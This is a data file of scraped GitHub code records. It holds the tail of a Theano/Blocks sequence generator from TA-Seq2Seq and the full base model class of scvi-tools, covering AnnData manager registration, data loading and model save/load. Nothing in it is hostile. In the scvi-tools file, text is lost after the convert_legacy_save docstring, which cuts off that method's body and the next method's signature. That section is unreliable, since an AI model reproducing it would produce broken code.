2);\r\n totalCost=twCost*tw_binary+rwCost;\r\n costs=-tensor.log(totalCost);\r\n\r\n if self.use_doubly_stochastic:\r\n # Doubly stochastic cost\r\n # \\lambda\\sum_{i}(1-\\sum_{t}w_{t, i})^2\r\n # the first dimensions of weights returned by transition\r\n # is batch, time\r\n weights = glimpses['weights']\r\n weights_sum_time = tensor.sum(weights, 0)\r\n penalties = tensor.ones_like(weights_sum_time) - weights_sum_time\r\n penalties_squared = tensor.pow(penalties, 2)\r\n ds_costs = tensor.sum(penalties_squared, 1)\r\n costs += (self.lambda_ds * ds_costs)[None, :]\r\n\r\n def step_decay_cost(states):\r\n # shape is time, batch, features\r\n eta = 0.0001\r\n xi = 100\r\n states_norm = states.norm(2, axis=2)\r\n zz = tensor.zeros([1, states.shape[1]])\r\n padded_norm = tensor.join(0, zz, states_norm)[:-1, :]\r\n diffs = states_norm - padded_norm\r\n costs = eta * (xi ** diffs)\r\n return costs\r\n\r\n if self.use_step_decay_cost:\r\n costs += step_decay_cost(states['states'])\r\n\r\n def stablilizer_cost(states):\r\n states_norm = states.norm(2, axis=2)\r\n zz = tensor.zeros([1, states.shape[1]])\r\n padded_norm = tensor.join(0, zz, states_norm)[:-1, :]\r\n diffs = states_norm - padded_norm\r\n costs = tensor.pow(diffs, 2)\r\n return costs\r\n\r\n if self.use_stablilizer:\r\n costs += self.lambda_st * stablilizer_cost(states['states'])\r\n\r\n if self.use_concentration_cost:\r\n # 
weights has shape [batch, time, source sentence len]\r\n            weights = glimpses['weights']\r\n            maxis = tensor.max(weights, axis=2)\r\n            lacks = tensor.ones_like(maxis) - maxis\r\n            costs += self.lambda_ct * lacks\r\n\r\n        if mask is not None:\r\n            costs *= mask\r\n\r\n        for name, variable in list(glimpses.items()) + list(states.items()):\r\n            application_call.add_auxiliary_variable(\r\n                variable.copy(), name=name)\r\n\r\n        # These variables can be used to initialize the initial states of the\r\n        # next batch using the last states of the current batch.\r\n        for name in self._state_names:\r\n            application_call.add_auxiliary_variable(\r\n                results[name][-1].copy(), name=name+\"_final_value\")\r\n\r\n        return costs\r\n\r\n\r\n    @recurrent\r\n    def generate(self, outputs,tw_vocab_overlap, **kwargs):\r\n        \"\"\"A sequence generation step.\r\n\r\n        Parameters\r\n        ----------\r\n        outputs : :class:`~tensor.TensorVariable`\r\n            The outputs from the previous step.\r\n\r\n        Notes\r\n        -----\r\n        The contexts, previous states and glimpses are expected as keyword\r\n        arguments.\r\n\r\n        \"\"\"\r\n        states = dict_subset(kwargs, self._state_names)\r\n        # masks in context are optional (e.g. `attended_mask`)\r\n        contexts = dict_subset(kwargs, self._context_names, must_have=False)\r\n        topical_word_contexts=dict_subset(kwargs, self._topical_context_names)\r\n        topical_embeddings=dict_subset(kwargs,[self.topical_name]);\r\n        content_embeddings=dict_subset(kwargs,[self.content_name]);\r\n        glimpses = dict_subset(kwargs, self._glimpse_names)\r\n        next_glimpses = self.transition.take_glimpses(\r\n            as_dict=True,\r\n            **dict_union(\r\n                states, glimpses,topical_embeddings,content_embeddings,contexts,topical_word_contexts));\r\n        glimpses_modified={'weighted_averages':next_glimpses['weighted_averages'],'weigths':next_glimpses['weights']}\r\n        next_readouts = self.readout.readout(\r\n            feedback=self.readout.feedback(outputs),\r\n            **dict_union(states, glimpses_modified, contexts))\r\n        next_tw_readouts=self.topicWordReadout.readout(\r\n            feedback=self.readout.feedback(outputs),\r\n            **dict_union(states, glimpses_modified, contexts))\r\n        twExp=tensor.exp(next_tw_readouts);\r\n        rwExp=tensor.exp(next_readouts);\r\n        Z=twExp.sum(keepdims=True,axis=1)+rwExp.sum(keepdims=True,axis=1);#remains uncertain,keepdims, and the # of axis\r\n        twExp/=Z;\r\n        rwExp/=Z;\r\n        probs=tensor.dot(twExp,tw_vocab_overlap)+rwExp;\r\n        next_outputs = self.sampleTarget.emit(probs);\r\n        next_costs = self.sampleTarget.cost(next_outputs, probs)\r\n        next_costs=-tensor.log(next_costs);\r\n        next_feedback = self.readout.feedback(next_outputs)\r\n        next_inputs = (self.fork.apply(next_feedback, as_dict=True)\r\n                       if self.fork else {'feedback': next_feedback})\r\n        next_states = self.transition.compute_states(\r\n            as_list=True,\r\n            **dict_union(next_inputs, states, next_glimpses, contexts,topical_word_contexts))\r\n        return (next_states + [next_outputs] +\r\n                list(next_glimpses.values()) + [next_costs])\r\n\r\n    @generate.delegate\r\n    def generate_delegate(self):\r\n        return self.transition.apply\r\n\r\n    @generate.property('states')\r\n    def generate_states(self):\r\n        return self._state_names + ['outputs'] + self._glimpse_names\r\n\r\n    @generate.property('outputs')\r\n    def generate_outputs(self):\r\n        return (self._state_names + ['outputs'] +\r\n                self._glimpse_names + ['costs'])\r\n\r\n    @generate.property('contexts')\r\n    def generate_contexts(self):\r\n        return (self.transition.apply.contexts+self._topical_context_names+[self.content_name]+[self.topical_name]\r\n                +['tw_vocab_overlap'])\r\n\r\n    def 
get_dim(self, name):\r\n if name in (self._state_names + self._context_names +\r\n self._glimpse_names):\r\n return self.transition.get_dim(name)\r\n elif name == 'outputs':\r\n return self.readout.get_dim(name)\r\n return super(BaseSequenceGenerator, self).get_dim(name)\r\n\r\n @application\r\n def initial_states(self, batch_size, *args, **kwargs):\r\n # TODO: support dict of outputs for application methods\r\n # to simplify this code.\r\n state_dict = dict(\r\n self.transition.initial_states(\r\n batch_size, as_dict=True, *args, **kwargs),\r\n outputs=self.readout.initial_outputs(batch_size))\r\n return [state_dict[state_name]\r\n for state_name in self.generate.states]\r\n\r\n @initial_states.property('outputs')\r\n def initial_states_outputs(self):\r\n return self.generate.states\r\n","repo_name":"LynetteXing1991/TA-Seq2Seq","sub_path":"SequenceGenerator_forPickTopicWord.py","file_name":"SequenceGenerator_forPickTopicWord.py","file_ext":"py","file_size_in_byte":14844,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"72"} +{"seq_id":"33068761021","text":"from __future__ import annotations\n\nimport inspect\nimport logging\nimport os\nimport warnings\nfrom abc import ABCMeta, abstractmethod\nfrom collections.abc import Sequence\nfrom uuid import uuid4\n\nimport numpy as np\nimport rich\nimport torch\nfrom anndata import AnnData\nfrom mudata import MuData\n\nfrom scvi import REGISTRY_KEYS, settings\nfrom scvi._types import AnnOrMuData, MinifiedDataType\nfrom scvi.autotune._types import TunableMixin\nfrom scvi.data import AnnDataManager\nfrom scvi.data._compat import registry_from_setup_dict\nfrom scvi.data._constants import (\n _MODEL_NAME_KEY,\n _SCVI_UUID_KEY,\n _SETUP_ARGS_KEY,\n _SETUP_METHOD_NAME,\n)\nfrom scvi.data._utils import _assign_adata_uuid, _check_if_view, _get_adata_minify_type\nfrom scvi.dataloaders import AnnDataLoader\nfrom scvi.model._utils import parse_device_args\nfrom scvi.model.base._utils import _load_legacy_saved_files\nfrom scvi.utils import attrdict, setup_anndata_dsp\nfrom scvi.utils._docstrings import devices_dsp\n\nfrom ._utils import _initialize_model, _load_saved_files, _validate_var_names\n\nlogger = logging.getLogger(__name__)\n\n\n_UNTRAINED_WARNING_MESSAGE = \"Trying to query inferred values from an untrained model. 
Please train the model first.\"\n\n_SETUP_INPUTS_EXCLUDED_PARAMS = {\"adata\", \"mdata\", \"kwargs\"}\n\n\nclass BaseModelMetaClass(ABCMeta):\n \"\"\"Metaclass for :class:`~scvi.model.base.BaseModelClass`.\n\n Constructs model class-specific mappings for :class:`~scvi.data.AnnDataManager` instances.\n ``cls._setup_adata_manager_store`` maps from AnnData object UUIDs to :class:`~scvi.data.AnnDataManager` instances.\n This mapping is populated everytime ``cls.setup_anndata()`` is called.\n ``cls._per_isntance_manager_store`` maps from model instance UUIDs to AnnData UUID::class:`~scvi.data.AnnDataManager` mappings.\n These :class:`~scvi.data.AnnDataManager` instances are tied to a single model instance and populated either\n during model initialization or after running ``self._validate_anndata()``.\n \"\"\"\n\n @abstractmethod\n def __init__(cls, name, bases, dct):\n cls._setup_adata_manager_store: dict[\n str, type[AnnDataManager]\n ] = {} # Maps adata id to AnnDataManager instances.\n cls._per_instance_manager_store: dict[\n str, dict[str, type[AnnDataManager]]\n ] = {} # Maps model instance id to AnnDataManager mappings.\n super().__init__(name, bases, dct)\n\n\nclass BaseModelClass(TunableMixin, metaclass=BaseModelMetaClass):\n \"\"\"Abstract class for scvi-tools models.\n\n Notes\n -----\n See further usage examples in the following tutorials:\n\n 1. :doc:`/tutorials/notebooks/dev/model_user_guide`\n \"\"\"\n\n _data_loader_cls = AnnDataLoader\n\n def __init__(self, adata: AnnOrMuData | None = None):\n # check if the given adata is minified and check if the model being created\n # supports minified-data mode (i.e. inherits from the abstract BaseMinifiedModeModelClass).\n # If not, raise an error to inform the user of the lack of minified-data functionality\n # for this model\n data_is_minified = (\n adata is not None and _get_adata_minify_type(adata) is not None\n )\n if data_is_minified and not issubclass(type(self), BaseMinifiedModeModelClass):\n raise NotImplementedError(\n f\"The {type(self).__name__} model currently does not support minified data.\"\n )\n self.id = str(uuid4()) # Used for cls._manager_store keys.\n if adata is not None:\n self._adata = adata\n self._adata_manager = self._get_most_recent_anndata_manager(\n adata, required=True\n )\n self._register_manager_for_instance(self.adata_manager)\n # Suffix registry instance variable with _ to include it when saving the model.\n self.registry_ = self._adata_manager.registry\n self.summary_stats = self._adata_manager.summary_stats\n\n self.is_trained_ = False\n self._model_summary_string = \"\"\n self.train_indices_ = None\n self.test_indices_ = None\n self.validation_indices_ = None\n self.history_ = None\n\n @property\n def adata(self) -> AnnOrMuData:\n \"\"\"Data attached to model instance.\"\"\"\n return self._adata\n\n @adata.setter\n def adata(self, adata: AnnOrMuData):\n if adata is None:\n raise ValueError(\"adata cannot be None.\")\n self._validate_anndata(adata)\n self._adata = adata\n self._adata_manager = self.get_anndata_manager(adata, required=True)\n self.registry_ = self._adata_manager.registry\n self.summary_stats = self._adata_manager.summary_stats\n\n @property\n def adata_manager(self) -> AnnDataManager:\n \"\"\"Manager instance associated with self.adata.\"\"\"\n return self._adata_manager\n\n def to_device(self, device: str | int):\n \"\"\"Move model to device.\n\n Parameters\n ----------\n device\n Device to move model to. Options: 'cpu' for CPU, integer GPU index (eg. 
0),\n or 'cuda:X' where X is the GPU index (eg. 'cuda:0'). See torch.device for more info.\n\n Examples\n --------\n >>> adata = scvi.data.synthetic_iid()\n >>> model = scvi.model.SCVI(adata)\n >>> model.to_device('cpu') # moves model to CPU\n >>> model.to_device('cuda:0') # moves model to GPU 0\n >>> model.to_device(0) # also moves model to GPU 0\n \"\"\"\n my_device = torch.device(device)\n self.module.to(my_device)\n\n @property\n def device(self) -> str:\n \"\"\"The current device that the module's params are on.\"\"\"\n return self.module.device\n\n @staticmethod\n def _get_setup_method_args(**setup_locals) -> dict:\n \"\"\"Returns a dictionary organizing the arguments used to call ``setup_anndata``.\n\n Must be called with ``**locals()`` at the start of the ``setup_anndata`` method\n to avoid the inclusion of any extraneous variables.\n \"\"\"\n cls = setup_locals.pop(\"cls\")\n method_name = None\n if \"adata\" in setup_locals:\n method_name = \"setup_anndata\"\n elif \"mdata\" in setup_locals:\n method_name = \"setup_mudata\"\n\n model_name = cls.__name__\n setup_args = {}\n for k, v in setup_locals.items():\n if k not in _SETUP_INPUTS_EXCLUDED_PARAMS:\n setup_args[k] = v\n return {\n _MODEL_NAME_KEY: model_name,\n _SETUP_METHOD_NAME: method_name,\n _SETUP_ARGS_KEY: setup_args,\n }\n\n @staticmethod\n def _create_modalities_attr_dict(\n modalities: dict[str, str], setup_method_args: dict\n ) -> attrdict:\n \"\"\"Preprocesses a ``modalities`` dictionary used in ``setup_mudata()`` to map modality names.\n\n Ensures each field key has a respective modality key, defaulting to ``None``.\n Raises a ``UserWarning`` if extraneous modality mappings are detected.\n\n Parameters\n ----------\n modalities\n Dictionary mapping ``setup_mudata()`` argument name to modality name.\n setup_method_args\n Output of ``_get_setup_method_args()``.\n \"\"\"\n setup_args = setup_method_args[_SETUP_ARGS_KEY]\n filtered_modalities = {\n arg_name: modalities.get(arg_name, None) for arg_name in setup_args.keys()\n }\n extra_modalities = set(modalities) - set(filtered_modalities)\n if len(extra_modalities) > 0:\n raise ValueError(\n f\"Extraneous modality mapping(s) detected: {extra_modalities}\"\n )\n return attrdict(filtered_modalities)\n\n @classmethod\n def register_manager(cls, adata_manager: AnnDataManager):\n \"\"\"Registers an :class:`~scvi.data.AnnDataManager` instance with this model class.\n\n Stores the :class:`~scvi.data.AnnDataManager` reference in a class-specific manager store.\n Intended for use in the ``setup_anndata()`` class method followed up by retrieval of the\n :class:`~scvi.data.AnnDataManager` via the ``_get_most_recent_anndata_manager()`` method in\n the model init method.\n\n Notes\n -----\n Subsequent calls to this method with an :class:`~scvi.data.AnnDataManager` instance referring to the same\n underlying AnnData object will overwrite the reference to previous :class:`~scvi.data.AnnDataManager`.\n \"\"\"\n adata_id = adata_manager.adata_uuid\n cls._setup_adata_manager_store[adata_id] = adata_manager\n\n def _register_manager_for_instance(self, adata_manager: AnnDataManager):\n \"\"\"Registers an :class:`~scvi.data.AnnDataManager` instance with this model instance.\n\n Creates a model-instance specific mapping in ``cls._per_instance_manager_store`` for this\n :class:`~scvi.data.AnnDataManager` instance.\n \"\"\"\n if self.id not in self._per_instance_manager_store:\n self._per_instance_manager_store[self.id] = {}\n\n adata_id = adata_manager.adata_uuid\n instance_manager_store = 
self._per_instance_manager_store[self.id]\n instance_manager_store[adata_id] = adata_manager\n\n def deregister_manager(self, adata: AnnData | None = None):\n \"\"\"Deregisters the :class:`~scvi.data.AnnDataManager` instance associated with `adata`.\n\n If `adata` is `None`, deregisters all :class:`~scvi.data.AnnDataManager` instances\n in both the class and instance-specific manager stores, except for the one associated\n with this model instance.\n \"\"\"\n cls_manager_store = self._setup_adata_manager_store\n instance_manager_store = self._per_instance_manager_store[self.id]\n\n if adata is None:\n instance_managers_to_clear = list(instance_manager_store.keys())\n cls_managers_to_clear = list(cls_manager_store.keys())\n else:\n adata_manager = self._get_most_recent_anndata_manager(adata, required=True)\n cls_managers_to_clear = [adata_manager.adata_uuid]\n instance_managers_to_clear = [adata_manager.adata_uuid]\n\n for adata_id in cls_managers_to_clear:\n # don't clear the current manager by default\n is_current_adata = (\n adata is None and adata_id == self.adata_manager.adata_uuid\n )\n if is_current_adata or adata_id not in cls_manager_store:\n continue\n del cls_manager_store[adata_id]\n\n for adata_id in instance_managers_to_clear:\n # don't clear the current manager by default\n is_current_adata = (\n adata is None and adata_id == self.adata_manager.adata_uuid\n )\n if is_current_adata or adata_id not in instance_manager_store:\n continue\n del instance_manager_store[adata_id]\n\n @classmethod\n def _get_most_recent_anndata_manager(\n cls, adata: AnnOrMuData, required: bool = False\n ) -> AnnDataManager | None:\n \"\"\"Retrieves the :class:`~scvi.data.AnnDataManager` for a given AnnData object specific to this model class.\n\n Checks for the most recent :class:`~scvi.data.AnnDataManager` created for the given AnnData object via\n ``setup_anndata()`` on model initialization. Unlike :meth:`scvi.model.base.BaseModelClass.get_anndata_manager`,\n this method is not model instance specific and can be called before a model is fully initialized.\n\n Parameters\n ----------\n adata\n AnnData object to find manager instance for.\n required\n If True, errors on missing manager. Otherwise, returns None when manager is missing.\n \"\"\"\n if _SCVI_UUID_KEY not in adata.uns:\n if required:\n raise ValueError(\n f\"Please set up your AnnData with {cls.__name__}.setup_anndata first.\"\n )\n return None\n\n adata_id = adata.uns[_SCVI_UUID_KEY]\n\n if adata_id not in cls._setup_adata_manager_store:\n if required:\n raise ValueError(\n f\"Please set up your AnnData with {cls.__name__}.setup_anndata first. \"\n \"It appears the AnnData object has been setup with a different model.\"\n )\n return None\n\n adata_manager = cls._setup_adata_manager_store[adata_id]\n if adata_manager.adata is not adata:\n raise ValueError(\n \"The provided AnnData object does not match the AnnData object \"\n \"previously provided for setup. Did you make a copy?\"\n )\n\n return adata_manager\n\n def get_anndata_manager(\n self, adata: AnnOrMuData, required: bool = False\n ) -> AnnDataManager | None:\n \"\"\"Retrieves the :class:`~scvi.data.AnnDataManager` for a given AnnData object specific to this model instance.\n\n Requires ``self.id`` has been set. Checks for an :class:`~scvi.data.AnnDataManager`\n specific to this model instance.\n\n Parameters\n ----------\n adata\n AnnData object to find manager instance for.\n required\n If True, errors on missing manager. 
Otherwise, returns None when manager is missing.\n \"\"\"\n cls = self.__class__\n if _SCVI_UUID_KEY not in adata.uns:\n if required:\n raise ValueError(\n f\"Please set up your AnnData with {cls.__name__}.setup_anndata first.\"\n )\n return None\n\n adata_id = adata.uns[_SCVI_UUID_KEY]\n if self.id not in cls._per_instance_manager_store:\n if required:\n raise AssertionError(\n \"Unable to find instance specific manager store. \"\n \"The model has likely not been initialized with an AnnData object.\"\n )\n return None\n elif adata_id not in cls._per_instance_manager_store[self.id]:\n if required:\n raise AssertionError(\n \"Please call ``self._validate_anndata`` on this AnnData object.\"\n )\n return None\n\n adata_manager = cls._per_instance_manager_store[self.id][adata_id]\n if adata_manager.adata is not adata:\n logger.info(\n \"AnnData object appears to be a copy. Attempting to transfer setup.\"\n )\n _assign_adata_uuid(adata, overwrite=True)\n adata_manager = self.adata_manager.transfer_fields(adata)\n self._register_manager_for_instance(adata_manager)\n\n return adata_manager\n\n def get_from_registry(\n self,\n adata: AnnOrMuData,\n registry_key: str,\n ) -> np.ndarray:\n \"\"\"Returns the object in AnnData associated with the key in the data registry.\n\n AnnData object should be registered with the model prior to calling this function\n via the ``self._validate_anndata`` method.\n\n Parameters\n ----------\n registry_key\n key of object to get from data registry.\n adata\n AnnData to pull data from.\n\n Returns\n -------\n The requested data as a NumPy array.\n \"\"\"\n adata_manager = self.get_anndata_manager(adata)\n if adata_manager is None:\n raise AssertionError(\n \"AnnData not registered with model. Call `self._validate_anndata` \"\n \"prior to calling this function.\"\n )\n return adata_manager.get_from_registry(registry_key)\n\n def _make_data_loader(\n self,\n adata: AnnOrMuData,\n indices: Sequence[int] | None = None,\n batch_size: int | None = None,\n shuffle: bool = False,\n data_loader_class=None,\n **data_loader_kwargs,\n ):\n \"\"\"Create a AnnDataLoader object for data iteration.\n\n Parameters\n ----------\n adata\n AnnData object with equivalent structure to initial AnnData.\n indices\n Indices of cells in adata to use. If `None`, all cells are used.\n batch_size\n Minibatch size for data loading into model. Defaults to `scvi.settings.batch_size`.\n shuffle\n Whether observations are shuffled each iteration though\n data_loader_class\n Class to use for data loader\n data_loader_kwargs\n Kwargs to the class-specific data loader class\n \"\"\"\n adata_manager = self.get_anndata_manager(adata)\n if adata_manager is None:\n raise AssertionError(\n \"AnnDataManager not found. 
Call `self._validate_anndata` prior to calling this function.\"\n )\n\n adata = adata_manager.adata\n\n if batch_size is None:\n batch_size = settings.batch_size\n if indices is None:\n indices = np.arange(adata.n_obs)\n if data_loader_class is None:\n data_loader_class = self._data_loader_cls\n\n if \"num_workers\" not in data_loader_kwargs:\n data_loader_kwargs.update({\"num_workers\": settings.dl_num_workers})\n\n dl = data_loader_class(\n adata_manager,\n shuffle=shuffle,\n indices=indices,\n batch_size=batch_size,\n **data_loader_kwargs,\n )\n return dl\n\n def _validate_anndata(\n self, adata: AnnOrMuData | None = None, copy_if_view: bool = True\n ) -> AnnData:\n \"\"\"Validate anndata has been properly registered, transfer if necessary.\"\"\"\n if adata is None:\n adata = self.adata\n\n _check_if_view(adata, copy_if_view=copy_if_view)\n\n adata_manager = self.get_anndata_manager(adata)\n if adata_manager is None:\n logger.info(\n \"Input AnnData not setup with scvi-tools. \"\n + \"attempting to transfer AnnData setup\"\n )\n self._register_manager_for_instance(\n self.adata_manager.transfer_fields(adata)\n )\n else:\n # Case where correct AnnDataManager is found, replay registration as necessary.\n adata_manager.validate()\n\n return adata\n\n def _check_if_trained(\n self, warn: bool = True, message: str = _UNTRAINED_WARNING_MESSAGE\n ):\n \"\"\"Check if the model is trained.\n\n If not trained and `warn` is True, raise a warning, else raise a RuntimeError.\n \"\"\"\n if not self.is_trained_:\n if warn:\n warnings.warn(\n message, UserWarning, stacklevel=settings.warnings_stacklevel\n )\n else:\n raise RuntimeError(message)\n\n @property\n def is_trained(self) -> bool:\n \"\"\"Whether the model has been trained.\"\"\"\n return self.is_trained_\n\n @property\n def test_indices(self) -> np.ndarray:\n \"\"\"Observations that are in test set.\"\"\"\n return self.test_indices_\n\n @property\n def train_indices(self) -> np.ndarray:\n \"\"\"Observations that are in train set.\"\"\"\n return self.train_indices_\n\n @property\n def validation_indices(self) -> np.ndarray:\n \"\"\"Observations that are in validation set.\"\"\"\n return self.validation_indices_\n\n @train_indices.setter\n def train_indices(self, value):\n self.train_indices_ = value\n\n @test_indices.setter\n def test_indices(self, value):\n self.test_indices_ = value\n\n @validation_indices.setter\n def validation_indices(self, value):\n self.validation_indices_ = value\n\n @is_trained.setter\n def is_trained(self, value):\n self.is_trained_ = value\n\n @property\n def history(self):\n \"\"\"Returns computed metrics during training.\"\"\"\n return self.history_\n\n def _get_user_attributes(self):\n \"\"\"Returns all the self attributes defined in a model class, e.g., `self.is_trained_`.\"\"\"\n attributes = inspect.getmembers(self, lambda a: not (inspect.isroutine(a)))\n attributes = [\n a for a in attributes if not (a[0].startswith(\"__\") and a[0].endswith(\"__\"))\n ]\n attributes = [a for a in attributes if not a[0].startswith(\"_abc_\")]\n return attributes\n\n def _get_init_params(self, locals):\n \"\"\"Returns the model init signature with associated passed in values.\n\n Ignores the initial AnnData.\n \"\"\"\n init = self.__init__\n sig = inspect.signature(init)\n parameters = sig.parameters.values()\n\n init_params = [p.name for p in parameters]\n all_params = {p: locals[p] for p in locals if p in init_params}\n all_params = {\n k: v\n for (k, v) in all_params.items()\n if not isinstance(v, AnnData) and not 
isinstance(v, MuData)\n }\n # not very efficient but is explicit\n # separates variable params (**kwargs) from non variable params into two dicts\n non_var_params = [p.name for p in parameters if p.kind != p.VAR_KEYWORD]\n non_var_params = {k: v for (k, v) in all_params.items() if k in non_var_params}\n var_params = [p.name for p in parameters if p.kind == p.VAR_KEYWORD]\n var_params = {k: v for (k, v) in all_params.items() if k in var_params}\n\n user_params = {\"kwargs\": var_params, \"non_kwargs\": non_var_params}\n\n return user_params\n\n @abstractmethod\n def train(self):\n \"\"\"Trains the model.\"\"\"\n\n def save(\n self,\n dir_path: str,\n prefix: str | None = None,\n overwrite: bool = False,\n save_anndata: bool = False,\n save_kwargs: dict | None = None,\n **anndata_write_kwargs,\n ):\n \"\"\"Save the state of the model.\n\n Neither the trainer optimizer state nor the trainer history are saved.\n Model files are not expected to be reproducibly saved and loaded across versions\n until we reach version 1.0.\n\n Parameters\n ----------\n dir_path\n Path to a directory.\n prefix\n Prefix to prepend to saved file names.\n overwrite\n Overwrite existing data or not. If `False` and directory\n already exists at `dir_path`, error will be raised.\n save_anndata\n If True, also saves the anndata\n save_kwargs\n Keyword arguments passed into :func:`~torch.save`.\n anndata_write_kwargs\n Kwargs for :meth:`~anndata.AnnData.write`\n \"\"\"\n if not os.path.exists(dir_path) or overwrite:\n os.makedirs(dir_path, exist_ok=overwrite)\n else:\n raise ValueError(\n f\"{dir_path} already exists. Please provide another directory for saving.\"\n )\n\n file_name_prefix = prefix or \"\"\n save_kwargs = save_kwargs or {}\n\n if save_anndata:\n file_suffix = \"\"\n if isinstance(self.adata, AnnData):\n file_suffix = \"adata.h5ad\"\n elif isinstance(self.adata, MuData):\n file_suffix = \"mdata.h5mu\"\n self.adata.write(\n os.path.join(dir_path, f\"{file_name_prefix}{file_suffix}\"),\n **anndata_write_kwargs,\n )\n\n model_save_path = os.path.join(dir_path, f\"{file_name_prefix}model.pt\")\n\n # save the model state dict and the trainer state dict only\n model_state_dict = self.module.state_dict()\n\n var_names = self.adata.var_names.astype(str)\n var_names = var_names.to_numpy()\n\n # get all the user attributes\n user_attributes = self._get_user_attributes()\n # only save the public attributes with _ at the very end\n user_attributes = {a[0]: a[1] for a in user_attributes if a[0][-1] == \"_\"}\n\n torch.save(\n {\n \"model_state_dict\": model_state_dict,\n \"var_names\": var_names,\n \"attr_dict\": user_attributes,\n },\n model_save_path,\n **save_kwargs,\n )\n\n @classmethod\n @devices_dsp.dedent\n def load(\n cls,\n dir_path: str,\n adata: AnnOrMuData | None = None,\n accelerator: str = \"auto\",\n device: int | str = \"auto\",\n prefix: str | None = None,\n backup_url: str | None = None,\n ):\n \"\"\"Instantiate a model from the saved output.\n\n Parameters\n ----------\n dir_path\n Path to saved outputs.\n adata\n AnnData organized in the same way as data used to train model.\n It is not necessary to run setup_anndata,\n as AnnData is validated against the saved `scvi` setup dictionary.\n If None, will check for and load anndata saved with the model.\n %(param_accelerator)s\n %(param_device)s\n prefix\n Prefix of saved file names.\n backup_url\n URL to retrieve saved outputs from if not present on disk.\n\n Returns\n -------\n Model with loaded state dictionaries.\n\n Examples\n --------\n >>> model 
= ModelClass.load(save_path, adata) # use the name of the model class used to save\n >>> model.get_....\n \"\"\"\n load_adata = adata is None\n _, _, device = parse_device_args(\n accelerator=accelerator,\n devices=device,\n return_device=\"torch\",\n validate_single_device=True,\n )\n\n (\n attr_dict,\n var_names,\n model_state_dict,\n new_adata,\n ) = _load_saved_files(\n dir_path,\n load_adata,\n map_location=device,\n prefix=prefix,\n backup_url=backup_url,\n )\n adata = new_adata if new_adata is not None else adata\n\n _validate_var_names(adata, var_names)\n\n registry = attr_dict.pop(\"registry_\")\n if _MODEL_NAME_KEY in registry and registry[_MODEL_NAME_KEY] != cls.__name__:\n raise ValueError(\n \"It appears you are loading a model from a different class.\"\n )\n\n if _SETUP_ARGS_KEY not in registry:\n raise ValueError(\n \"Saved model does not contain original setup inputs. \"\n \"Cannot load the original setup.\"\n )\n\n # Calling ``setup_anndata`` method with the original arguments passed into\n # the saved model. This enables simple backwards compatibility in the case of\n # newly introduced fields or parameters.\n method_name = registry.get(_SETUP_METHOD_NAME, \"setup_anndata\")\n getattr(cls, method_name)(\n adata, source_registry=registry, **registry[_SETUP_ARGS_KEY]\n )\n\n model = _initialize_model(cls, adata, attr_dict)\n model.module.on_load(model)\n model.module.load_state_dict(model_state_dict)\n\n model.to_device(device)\n model.module.eval()\n model._validate_anndata(adata)\n return model\n\n @classmethod\n def convert_legacy_save(\n cls,\n dir_path: str,\n output_dir_path: str,\n overwrite: bool = False,\n prefix: str | None = None,\n **save_kwargs,\n ) -> None:\n \"\"\"Converts a legacy saved model ( None:\n \"\"\"Print args used to setup a saved model.\n\n Parameters\n ----------\n dir_path\n Path to saved outputs.\n prefix\n Prefix of saved file names.\n \"\"\"\n registry = BaseModelClass.load_registry(dir_path, prefix)\n AnnDataManager.view_setup_method_args(registry)\n\n @staticmethod\n def load_registry(dir_path: str, prefix: str | None = None) -> dict:\n \"\"\"Return the full registry saved with the model.\n\n Parameters\n ----------\n dir_path\n Path to saved outputs.\n prefix\n Prefix of saved file names.\n\n Returns\n -------\n The full registry saved with the model\n \"\"\"\n attr_dict = _load_saved_files(dir_path, False, prefix=prefix)[0]\n\n # Legacy support for old setup dict format.\n if \"scvi_setup_dict_\" in attr_dict:\n raise NotImplementedError(\n \"Viewing setup args for pre v0.15.0 models is unsupported. \"\n \"Update your save files with ``convert_legacy_save`` first.\"\n )\n\n return attr_dict.pop(\"registry_\")\n\n def view_anndata_setup(\n self, adata: AnnOrMuData | None = None, hide_state_registries: bool = False\n ) -> None:\n \"\"\"Print summary of the setup for the initial AnnData or a given AnnData object.\n\n Parameters\n ----------\n adata\n AnnData object setup with ``setup_anndata`` or\n :meth:`~scvi.data.AnnDataManager.transfer_fields`.\n hide_state_registries\n If True, prints a shortened summary without details of each state registry.\n \"\"\"\n if adata is None:\n adata = self.adata\n try:\n adata_manager = self.get_anndata_manager(adata, required=True)\n except ValueError as err:\n raise ValueError(\n f\"Given AnnData not setup with {self.__class__.__name__}. 
\"\n \"Cannot view setup summary.\"\n ) from err\n adata_manager.view_registry(hide_state_registries=hide_state_registries)\n\n\nclass BaseMinifiedModeModelClass(BaseModelClass):\n \"\"\"Abstract base class for scvi-tools models that can handle minified data.\"\"\"\n\n @property\n def minified_data_type(self) -> MinifiedDataType | None:\n \"\"\"The type of minified data associated with this model, if applicable.\"\"\"\n return (\n self.adata_manager.get_from_registry(REGISTRY_KEYS.MINIFY_TYPE_KEY)\n if REGISTRY_KEYS.MINIFY_TYPE_KEY in self.adata_manager.data_registry\n else None\n )\n\n @abstractmethod\n def minify_adata(\n self,\n *args,\n **kwargs,\n ):\n \"\"\"Minifies the model's adata.\n\n Minifies the adata, and registers new anndata fields as required (can be model-specific).\n This also sets the appropriate property on the module to indicate that the adata is minified.\n\n Notes\n -----\n The modification is not done inplace -- instead the model is assigned a new (minified)\n version of the adata.\n \"\"\"\n\n @staticmethod\n @abstractmethod\n def _get_fields_for_adata_minification(minified_data_type: MinifiedDataType):\n \"\"\"Return the anndata fields required for adata minification of the given type.\"\"\"\n\n def _update_adata_and_manager_post_minification(\n self, minified_adata: AnnOrMuData, minified_data_type: MinifiedDataType\n ):\n \"\"\"Update the anndata and manager inplace after creating a minified adata.\"\"\"\n # Register this new adata with the model, creating a new manager in the cache\n self._validate_anndata(minified_adata)\n new_adata_manager = self.get_anndata_manager(minified_adata, required=True)\n # This inplace edits the manager\n new_adata_manager.register_new_fields(\n self._get_fields_for_adata_minification(minified_data_type)\n )\n # We set the adata attribute of the model as this will update self.registry_\n # and self.adata_manager with the new adata manager\n self.adata = minified_adata\n\n @property\n def summary_string(self):\n \"\"\"Summary string of the model.\"\"\"\n summary_string = super().summary_string\n summary_string += \"\\nModel's adata is minified?: {}\".format(\n hasattr(self, \"minified_data_type\") and self.minified_data_type is not None\n )\n return summary_string\n","repo_name":"scverse/scvi-tools","sub_path":"scvi/model/base/_base_model.py","file_name":"_base_model.py","file_ext":"py","file_size_in_byte":34481,"program_lang":"python","lang":"en","doc_type":"code","stars":1037,"dataset":"github-code","pt":"72"} 